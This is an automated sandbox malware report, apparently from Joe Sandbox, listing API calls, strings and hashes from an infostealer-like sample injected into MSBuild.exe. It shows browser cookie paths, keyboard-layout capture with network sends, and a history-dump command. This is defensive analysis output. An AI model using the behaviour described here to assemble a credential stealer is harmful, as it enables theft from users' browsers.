                                          • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                          • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                          Strings
                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                          • API String ID: 3024135584-2418719853
                                          • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                          • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                          • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                          • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                          APIs
                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: GetCursorInfo$User32.dll$`#v
                                          • API String ID: 1646373207-1032071883
                                          • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                          • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                          • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                          • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                          • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                          • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                          • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                          APIs
                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          • _free.LIBCMT ref: 00444E06
                                          • _free.LIBCMT ref: 00444E1D
                                          • _free.LIBCMT ref: 00444E3C
                                          • _free.LIBCMT ref: 00444E57
                                          • _free.LIBCMT ref: 00444E6E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID:
                                          • API String ID: 3033488037-0
                                          • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                          • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                          • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                          • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                          • _free.LIBCMT ref: 004493BD
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 00449589
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                          • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                          • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                          • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                          APIs
                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                            • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 4269425633-0
                                          • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                          • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                          • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                          • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                          • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                          • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                          • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                          • _free.LIBCMT ref: 0044F3BF
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                          • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                          • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                          • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                          APIs
                                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID:
                                          • API String ID: 1852769593-0
                                          • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                          • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                          • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                          • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                          APIs
                                          • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                          • _free.LIBCMT ref: 004482D3
                                          • _free.LIBCMT ref: 004482FA
                                          • SetLastError.KERNEL32(00000000), ref: 00448307
                                          • SetLastError.KERNEL32(00000000), ref: 00448310
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                          • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                          • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                          • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                          APIs
                                          • _free.LIBCMT ref: 004509D4
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 004509E6
                                          • _free.LIBCMT ref: 004509F8
                                          • _free.LIBCMT ref: 00450A0A
                                          • _free.LIBCMT ref: 00450A1C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                          APIs
                                          • _free.LIBCMT ref: 00444066
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 00444078
                                          • _free.LIBCMT ref: 0044408B
                                          • _free.LIBCMT ref: 0044409C
                                          • _free.LIBCMT ref: 004440AD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: PkGNG
                                          • API String ID: 0-263838557
                                          • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                          • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                          • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                          • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                          APIs
                                          • _strpbrk.LIBCMT ref: 0044E738
                                          • _free.LIBCMT ref: 0044E855
                                            • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                            • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                            • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                          • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                          • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                          • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: !D@$NG
                                          • API String ID: 180926312-2721294649
                                          • Opcode ID: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                                          • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                          • Opcode Fuzzy Hash: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                                          • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                          APIs
                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                            • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                            • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                          • String ID: XQG$NG$PG
                                          • API String ID: 1634807452-3565412412
                                          • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                          • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                          • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                          • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: `#D$`#D
                                          • API String ID: 885266447-2450397995
                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                          • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                          • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00443475
                                          • _free.LIBCMT ref: 00443540
                                          • _free.LIBCMT ref: 0044354A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          • API String ID: 2506810119-4083458154
                                          • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                          • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                          • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                          • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                          • GetLastError.KERNEL32 ref: 0044B931
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                          • String ID: PkGNG
                                          • API String ID: 2456169464-263838557
                                          • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                          • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                          • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                          • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                          • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                          • String ID: /sort "Visit Time" /stext "$0NG
                                          • API String ID: 368326130-3219657780
                                          • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                          • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                          • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                          • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                          APIs
                                          • _wcslen.LIBCMT ref: 004162F5
                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                            • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                            • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen$CloseCreateValue
                                          • String ID: !D@$okmode$PG
                                          • API String ID: 3411444782-3370592832
                                          • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                          • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                          • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                          • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                          APIs
                                            • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C603
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                          • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                          • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                          • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                          APIs
                                            • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
